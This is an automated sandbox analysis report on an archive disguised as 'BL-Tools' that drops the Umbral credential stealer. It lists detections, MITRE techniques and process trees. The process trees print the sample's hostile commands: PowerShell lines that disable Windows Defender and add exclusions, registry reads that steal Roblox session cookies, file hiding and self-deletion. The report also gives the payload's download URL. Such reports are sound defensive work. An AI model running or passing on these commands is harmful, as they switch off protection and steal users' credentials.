umbral | hxxps://files[.]catbox[.]moe/tmf8tc[.]rar

Analysis

max time kernel
194s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
20-06-2024 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://files.catbox.moe/tmf8tc.rar

Score

10^/10

umbral evasion execution spyware stealer themida trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000700000002348c-224.dat	family_umbral
behavioral1/memory/5520-232-0x0000022853980000-0x00000228539C0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CookiesCreator v1.2.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5708	powershell.exe
3136	powershell.exe
5740	powershell.exe
6048	powershell.exe

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CookiesCreator v1.2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CookiesCreator v1.2.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	BL-Tools-v2.8.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	BL-Tools-v2.8.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	BL-Tools-v2.8.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	BL-Tools-v2.8.3.exe

Executes dropped EXE 13 IoCs

pid	Process
5224	BL-Tools-v2.8.3.exe
5416	BLTools 2.8.4 FIX.exe
5520	Umbral.exe
5360	CookiesCreator v1.2.exe
3460	BL-Tools-v2.8.3.exe
5588	BLTools 2.8.4 FIX.exe
3504	Umbral.exe
5380	BL-Tools-v2.8.3.exe
5404	BLTools 2.8.4 FIX.exe
5068	Umbral.exe
5600	BL-Tools-v2.8.3.exe
2012	BLTools 2.8.4 FIX.exe
5948	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000700000002343d-348.dat	themida
behavioral1/memory/5360-354-0x0000000000350000-0x0000000000C42000-memory.dmp	themida
behavioral1/memory/5360-355-0x0000000000350000-0x0000000000C42000-memory.dmp	themida
behavioral1/memory/5360-504-0x0000000000350000-0x0000000000C42000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CookiesCreator v1.2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
105	discord.com
114	discord.com
115	discord.com
56	discord.com
57	discord.com
79	discord.com
80	discord.com
104	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ip-api.com
73	ip-api.com
98	ip-api.com
108	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
5416	BLTools 2.8.4 FIX.exe
5360	CookiesCreator v1.2.exe
5588	BLTools 2.8.4 FIX.exe
5404	BLTools 2.8.4 FIX.exe
2012	BLTools 2.8.4 FIX.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 4 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5848	wmic.exe
6036	wmic.exe
4392	wmic.exe
5396	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133633240669077651"	chrome.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
5892	PING.EXE
4068	PING.EXE
2696	PING.EXE
744	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2200	chrome.exe
2200	chrome.exe
5520	Umbral.exe
5520	Umbral.exe
5740	powershell.exe
5740	powershell.exe
5740	powershell.exe
5900	powershell.exe
5900	powershell.exe
5900	powershell.exe
6112	powershell.exe
6112	powershell.exe
6112	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe
5160	powershell.exe
5160	powershell.exe
5160	powershell.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
5360	CookiesCreator v1.2.exe
5360	CookiesCreator v1.2.exe
3504	Umbral.exe
3504	Umbral.exe
6048	powershell.exe
6048	powershell.exe
6048	powershell.exe
2836	powershell.exe
2836	powershell.exe
2836	powershell.exe
5204	powershell.exe
5204	powershell.exe
5204	powershell.exe
5432	powershell.exe
5432	powershell.exe
5432	powershell.exe
5696	powershell.exe
5696	powershell.exe
5696	powershell.exe
5068	Umbral.exe
5068	Umbral.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
5580	powershell.exe
5580	powershell.exe
5580	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
5944	powershell.exe
5944	powershell.exe
5944	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
1784	chrome.exe
1784	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2200	chrome.exe
2200	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeRestorePrivilege	2496	7zG.exe
Token: 35	2496	7zG.exe
Token: SeSecurityPrivilege	2496	7zG.exe
Token: SeSecurityPrivilege	2496	7zG.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeDebugPrivilege	5224	BL-Tools-v2.8.3.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeDebugPrivilege	5520	Umbral.exe
Token: SeShutdownPrivilege	2200	chrome.exe
Token: SeCreatePagefilePrivilege	2200	chrome.exe
Token: SeIncreaseQuotaPrivilege	5636	wmic.exe
Token: SeSecurityPrivilege	5636	wmic.exe
Token: SeTakeOwnershipPrivilege	5636	wmic.exe
Token: SeLoadDriverPrivilege	5636	wmic.exe
Token: SeSystemProfilePrivilege	5636	wmic.exe
Token: SeSystemtimePrivilege	5636	wmic.exe
Token: SeProfSingleProcessPrivilege	5636	wmic.exe
Token: SeIncBasePriorityPrivilege	5636	wmic.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2496	7zG.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe

Suspicious use of SendNotifyMessage 57 IoCs

pid	Process
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
2200	chrome.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe
440	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2200 wrote to memory of 1288	2200	chrome.exe	82
PID 2200 wrote to memory of 1288	2200	chrome.exe	82
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 4804	2200	chrome.exe	83
PID 2200 wrote to memory of 3676	2200	chrome.exe	84
PID 2200 wrote to memory of 3676	2200	chrome.exe	84
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85
PID 2200 wrote to memory of 4888	2200	chrome.exe	85

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5224	attrib.exe
2876	attrib.exe
5700	attrib.exe
5740	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://files.catbox.moe/tmf8tc.rar
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff5614ab58,0x7fff5614ab68,0x7fff5614ab78
  2⤵
  PID:1288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:2
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
  2⤵
  PID:3676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:1
  2⤵
  PID:660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4592 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4272 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:8
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2416 --field-trial-handle=1828,i,17898017523201593129,5848067582306827413,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1784

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:832

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4732

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap30767:74:7zEvent18656
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2496

C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5224
- C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
  "C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5416
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5520
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5636
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:5700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3856
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2036
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:316
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5160
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5396
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:5820
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:5892

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:440

C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\CookiesCreator v1.2.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5360

C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe
"C:\Users\Admin\Downloads\BL-Tools-v2.8.3\BL-Tools-v2.8.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3460
- C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe
  "C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:5588
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3504
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4332
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:5740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
